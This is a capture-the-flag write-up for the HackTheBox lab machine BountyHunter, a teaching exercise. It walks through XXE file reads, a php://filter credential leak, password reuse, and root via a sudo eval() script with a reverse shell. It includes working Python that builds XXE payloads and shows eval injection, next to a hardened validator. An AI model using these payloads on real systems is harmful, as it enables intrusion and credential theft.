HackTheBox Writeup — BountyHunter
Hello guys, I am Faisal Husaini. My username on HTB is “fa1sal”. Also join me on Discord.
The IP of this box is 10.10.11.100.
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.100
The scan found two open ports:
- Port 22 → SSH
- Port 80 → HTTP (web)
Way to User
Opening the site in a browser, I was redirected to a Bounty Hunters web page.
Clicking the Menu button lists three options: About, Contact and Portal.
The About and Contact options did not lead anywhere, but the Portal option leads to portal.php, which says the portal is under development and links to another page.
That link goes to log_submit.php, a beta version of the Bounty Report System with a few input fields.
Filling in some data and intercepting the submission in Burp Suite shows that the form data is sent base64-encoded.
Decoding the string with Burp's Decoder shows that it is an XML document, so the server is parsing XML that we fully control, which is the precondition for XXE.
I modified the XML to declare an external entity pointing at a local file (XXE injection) and base64-encoded it again.
Sending the request with the modified string returns the contents of /etc/passwd in the response, so the parser resolves external entities and reflects the result.
Having no other leads, I ran gobuster to brute-force directories and files on the web server.
The db.php file looked interesting, so I modified the payload to fetch it through the php://filter wrapper, which base64-encodes the file before the entity is substituted. A plain file:// entity usually fails on PHP source because the <?php tag and other special characters break the XML parsing, so the base64 filter is the standard workaround.
Sending the request with this payload returned a base64 string in the response, the encoded contents of db.php.
Decoding that string reveals the database credentials.
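The XXE chain above, from the decoded XML envelope to the php://filter read of db.php, as an added Python example that is not part of the original writeup. The element names (bugreport, title, cwe, cvss, reward), the entity name xxe and the form parameter name data are assumptions for this example; substitute whatever Burp's Decoder actually shows for the real request.

```python
import base64
from urllib.parse import urlencode

# Constructed stand-in for the report envelope seen in Burp's Decoder.
# The element names and the form parameter name ("data") are assumptions
# for this example; use whatever the real decoded request shows.
REPORT_TEMPLATE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "{doctype}"
    "<bugreport>\n"
    "  <title>{title}</title>\n"
    "  <cwe>{cwe}</cwe>\n"
    "  <cvss>{cvss}</cvss>\n"
    "  <reward>{reward}</reward>\n"
    "</bugreport>\n"
)


def xxe_doctype(path: str, php_filter: bool) -> str:
    """Internal DTD declaring an external entity that resolves to a local resource."""
    if php_filter:
        # php://filter base64-encodes the file before it is substituted, so PHP
        # source (<?php tags, quotes, '<' in comparisons) cannot break the XML.
        resource = f"php://filter/convert.base64-encode/resource={path}"
    else:
        resource = f"file://{path}"
    return f'<!DOCTYPE bugreport [<!ENTITY xxe SYSTEM "{resource}">]>\n'


def build_payload(path: str, php_filter: bool = False) -> str:
    """Return the base64 string to drop into the intercepted request."""
    xml = REPORT_TEMPLATE.format(
        doctype=xxe_doctype(path, php_filter),
        title="&xxe;",  # reflected field: whatever the entity expands to comes back here
        cwe="CWE-611",
        cvss="9.8",
        reward="1",
    )
    return base64.b64encode(xml.encode("latin-1")).decode("ascii")


def form_body(payload_b64: str) -> str:
    """URL-encode the base64 so '+' and '=' survive an x-www-form-urlencoded body."""
    return urlencode({"data": payload_b64})


def decode_payload(payload_b64: str) -> str:
    """What Burp's Decoder does: base64 -> XML text."""
    return base64.b64decode(payload_b64).decode("latin-1")


def recover_file(reflected_b64: str) -> str:
    """Decode the base64 that the php://filter entity injects into the response."""
    return base64.b64decode(reflected_b64).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # First payload reads /etc/passwd directly; second reads db.php via php://filter.
    print(decode_payload(build_payload("/etc/passwd")))
    print(form_body(build_payload("db.php", php_filter=True)))
```

The URL-encoding step matters when pasting into Burp Repeater: an unencoded '+' in the form body is decoded as a space on the server and the base64 will not decode.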
There is no admin user on the machine (confirmed from /etc/passwd), but there is a user named development, so I tried the database password for that user over SSH and got a session: the password was reused.
The user flag is in that user's home directory.
Way to Root
In the user's home directory there is a file named contract.txt with a note about a tool on the machine.
Running sudo -l shows that the current user can run a ticketValidator.py script in the /opt directory as root without a password.
Reading the script shows that it takes a Markdown (.md) file as input, and that its evaluate method passes part of that file to eval(). Because the file is attacker-controlled and the script runs as root, this is code execution as root.
So I created an .md file whose contents satisfy the script's format checks and carry a Python expression that spawns a reverse shell.
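The eval() sink described above, as an added Python example that is not part of the original writeup or the box's ticketValidator.py. The Markdown layout (a line starting with the constructed marker Code:) and the function names are assumptions; the vulnerable function keeps the unsafe eval() pattern, and the hardened version beside it parses the expression into an AST and accepts only integer arithmetic. The malicious ticket calls a harmless os function where a real attacker would put the os.system() reverse shell.

```python
import ast
import operator

# Constructed stand-in for a ticket validator: a Markdown file carries a
# "ticket code" on a line starting with this marker, and the validator
# evaluates that code as a Python expression. The marker and the file
# layout are assumptions for this example, not the box's actual script.
CODE_MARKER = "Code:"


def extract_code(ticket_md: str) -> str:
    """Pull the expression text out of the Markdown ticket."""
    for line in ticket_md.splitlines():
        if line.startswith(CODE_MARKER):
            return line[len(CODE_MARKER):].strip()
    raise ValueError("ticket has no code line")


def evaluate_unsafe(ticket_md: str):
    """The vulnerable pattern: eval() on text read from a user-supplied file.
    Run as root via sudo, any expression here is root code execution."""
    return eval(extract_code(ticket_md))  # deliberately unsafe


# Hardened replacement: parse the expression and walk the AST, allowing only
# integer literals and a fixed set of arithmetic operators.
_ALLOWED_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Mod: operator.mod,
}


def _eval_arith(node: ast.AST) -> int:
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _ALLOWED_OPS:
        return _ALLOWED_OPS[type(node.op)](_eval_arith(node.left), _eval_arith(node.right))
    # Calls, attribute access, names, strings: anything that is not arithmetic is refused.
    raise ValueError(f"disallowed expression node: {type(node).__name__}")


def evaluate_safe(ticket_md: str) -> int:
    tree = ast.parse(extract_code(ticket_md), mode="eval")
    return _eval_arith(tree.body)


def is_rejected(ticket_md: str) -> bool:
    """True if the hardened validator refuses the ticket."""
    try:
        evaluate_safe(ticket_md)
        return False
    except (ValueError, SyntaxError):
        return True


# Constructed tickets. The malicious one runs a harmless os call in place of
# the reverse-shell command an attacker would use, e.g. os.system("bash -c ...").
BENIGN_TICKET = "# Ticket\nCode: 11 + 4\n"
MALICIOUS_TICKET = "# Ticket\nCode: __import__('os').getpid()\n"


if __name__ == "__main__":
    print("unsafe, benign:", evaluate_unsafe(BENIGN_TICKET))
    print("unsafe, malicious (executed!):", evaluate_unsafe(MALICIOUS_TICKET))
    print("safe, benign:", evaluate_safe(BENIGN_TICKET))
    print("safe, malicious rejected:", is_rejected(MALICIOUS_TICKET))
```

The point of the AST walk is that the only values it can produce are integers computed from integer literals, so there is no path from the ticket text to a function call, an attribute lookup or an import, regardless of what format checks run before it.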
I ran the script with sudo on that file.
A reverse shell came back to the netcat listener as root.
The root flag is in the /root directory.